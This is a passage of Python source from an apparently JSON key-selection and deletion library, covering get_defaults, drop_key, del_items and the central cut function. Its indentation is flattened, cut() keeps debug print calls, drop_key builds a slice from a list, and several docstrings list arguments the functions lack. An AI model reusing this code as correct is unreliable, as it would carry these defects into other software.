kwds = dict(op='get', itemnum=n, data=d, keylist=keylists)
raise exc.KeyNotFound(e, **kwds)
except exc.IndexOutOfRange as e:
kwds = dict(op='get', itemnum=n, data=d, keylist=keylists)
raise exc.IndexOutOfRange(e, **kwds)
except exc.KeyTypeError as e:
kwds = dict(op='get', itemnum=n, data=d, keylist=keylists)
raise exc.KeyTypeError(e, **kwds)
return result
def get_defaults(d, *defaults, fullpath=False, n=0):
"""Get nested items from keys, set default value if key not found.
Args:
d (Mapping or Sequence): JSON encodable data (document)
*defaults (List[Tuple(List[str], str)]):
(List[str]) - JSON Keys (name, index or trailing slice)
(str) - A string evaluated as a Python literal (see
Default Values)
Python JSON
====== ======
dict object
list array
str string
int number
float number
True true
False false
None null
fullpath (bool): Use the full JSON Key path in the target name.
n (int): Data item number being processed; shown to user in
exception handling.
Returns:
dict: All Key/Values in data referenced by JSON Keys or default
values when key is not found.
Raises:
KeyTypeError: When trying to use a key on a Sequence
or an index on a Mapping.
Examples:
>>> d = {'k1': {'k2': 'item1'}}
>>> defaults = [(['k1', 'k2'], None), (['k3'], False)]
>>> get_defaults(d, *defaults)
{'k2': 'item1', 'k3': False}
>>> get_defaults(d, *defaults, fullpath=True)
{'k1.k2': 'item1', 'k3': False}
"""
try:
return {into_key(k, fullpath): select_key(d, *k, default=v)
for k, v in defaults}
except exc.KeyTypeError as e:
kwds = dict(op='getdefaults', data=d, keylists=defaults)
raise exc.KeyTypeError(e, **kwds)
def drop_key(d, *keys, no_key_error=True):
"""Delete nested item from Mapping or Sequence given list of keys.
Args:
d (Mapping or Sequence): JSON encodable data (document)
*keylists List[str]: JSON Keys (name, index or trailing slice)
no_key_error (bool): If True, ignore Key Errors.
Raises:
KeyError
IndexError
TypeError
Examples:
>>> d = {'k1': {'k2': 'Deleted!'}}
>>> drop_key(d, 'k1', 'k2')
>>> d
{'k1': {}}
>>> d = {'k1': [{'k2': 'Deleted!'}]}
>>> drop_key(d, 'k1', 0)
>>> d
{'k1': []}
>>> d = ['As an index']
>>> drop_key(d, '0')
>>>
[]
>>> d = ['As an index']
>>> drop_key(d, '0')
>>>
[]
"""
parent = d if len(keys) == 1 else select_key(d, *keys[:-1])
try:
del parent[keys[-1]]
except (KeyError, IndexError):
if not no_key_error:
raise
except TypeError:
key = keys[-1]
if key.isdigit():
del parent[int(key)]
elif SLICE_RE.match(key):
del parent[slice(key.split(':'))]
else:
raise
def del_items(d, *keylists, any=False, n=0):
"""Delete multiple nested items from a dict using lists of keys.
Args:
d (Mapping or Sequence): JSON encodable data (document)
*keylists List[str]: JSON Keys (name, index or trailing slice)
any (bool): If True delete any instance of the JSON Key value
that exists; if False, raise KeyNotFound error if the key
is missing.
n (int): Data item number being processed; shown to user in
exception handling.
Raises:
KeyNotFound: Only returned if 'any' option is not set.
KeyTypeError: When trying to use a key on a Sequence
or an index on a Mapping.
IndexOutOfRange: Only returned if 'any' option is not set.
Examples:
>>> d = {'k1': {'k2': 'item1'}, 'k3': 'item2'}
>>> del_items(d, ['k1', 'k2'], ['k3'])
>>> d
{'k1': {}}
"""
for keylist in keylists:
try:
drop_key(d, *keylist, no_key_error=any)
except KeyError as e:
if not any:
kwds = dict(op='del', itemnum=n, data=d, keylist=keylist)
raise exc.KeyNotFound(e, **kwds)
except IndexError as e:
kwds = dict(op='del', itemnum=n, data=d, keylists=keylists)
raise exc.IndexOutOfRange(e, **kwds)
except TypeError as e:
kwds = dict(op='del', itemnum=n, data=d, keylists=keylists)
raise exc.KeyTypeError(e, **kwds)
def cut(data, rootkey=None, getkeys=None, getdefaults=None, delkeys=None,
any=False, listkeys=False, inspect=False, count=False, fullpath=False,
fullscan=False, quotechar='"', slice_=False):
"""Translate the given user data & parameters into actions.
This function is effectively the hub/core of JSON cut.
Args:
data (obj): a JSON encodable object.
rootkey (str): set the root of the object (JSON Key)
getkeys (str): select properties (JSON Keys)
getany (str): select properties (JSON Kyes); ignore if key not
found.
getdefaults (List[Tuple(List[str], str)]):
select properties Tuple(List[JSON Key], Default-Value]);
use the default value if the key isn't found. Default values
are strings that are evaluated as Python literals.
delkeys (str): drop properties (JSON Keys)
any (bool): If True get/dele any instance of the JSON Key value
that exists; if False, raise KeyNotFound error if the key
or index does not exist.
listkeys (bool): enumerated, sorted list all unique JSON Keys.
inspect (bool): sorted list of all unique JSON Keys.
count (bool):
flatten (str): flatten specified key numbers (output of --list)
rows (str): generate flattened row data from specified root key
number (output of --list), optionally prepend each row with
specified comma-separated key numbers as second argument
fullpath (bool): used with get*; include the full key name path.
fullscan (bool): don't skip previously visited JSON Keys.
quotechar (str): the quote character used around JSON Keys.
slice (bool): when the document root is an array don't iterate
"""
if rootkey:
keylist = parse_keystr(rootkey, data, quotechar, None, fullscan)
data = get_rootkey(data, *keylist[0])
if getkeys or getdefaults or delkeys:
data = Items([data] if slice_ else data)
items = deepcopy(data.items) if getkeys and getdefaults else data.items
keys = find_keys(data.value, fullscan)
full, qchar = fullpath, quotechar
if getkeys:
keylists = parse_keystr(getkeys, data.items, quotechar, keys)
data.items = [get_items(d, *keylists, fullpath=full, any=any, n=n)
for n, d in enumerate(data.items, 1)]
if getdefaults:
print(getdefaults)
defaults = getdefaults
kwds = dict(data=data, quotechar=qchar, keys=keys, fullscan=full)
defaults = [parse_defaults(i[0], j, **kwds) for i, j in defaults]
print(defaults)
for n, item in enumerate(items, 1):
results = get_defaults(item, *defaults, fullpath=full, n=n)
data.items[n - 1].update(results)
if delkeys:
keylists = parse_keystr(delkeys, data.items, quotechar, keys)
for item_num, item in enumerate(data.items):
del_items(item, *keylists, any=any, n=item_num)
data = data.value
if inspect:
return inspect_json(data)
elif listkeys:
return list_keys(data, fullscan)
elif count:
return count_arrays(data)
else:
return data
def listkeys(d):
return find_keys(d, fullscan=True)
def keynums(d):
return dict(enumerate(listkeys(d), 1))
def inspectkeys(d):
print('\n'.join(inspect_json(d, nocolor=True, array_char='*')))
def arraycounts(d):
print(count_arrays(d))
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.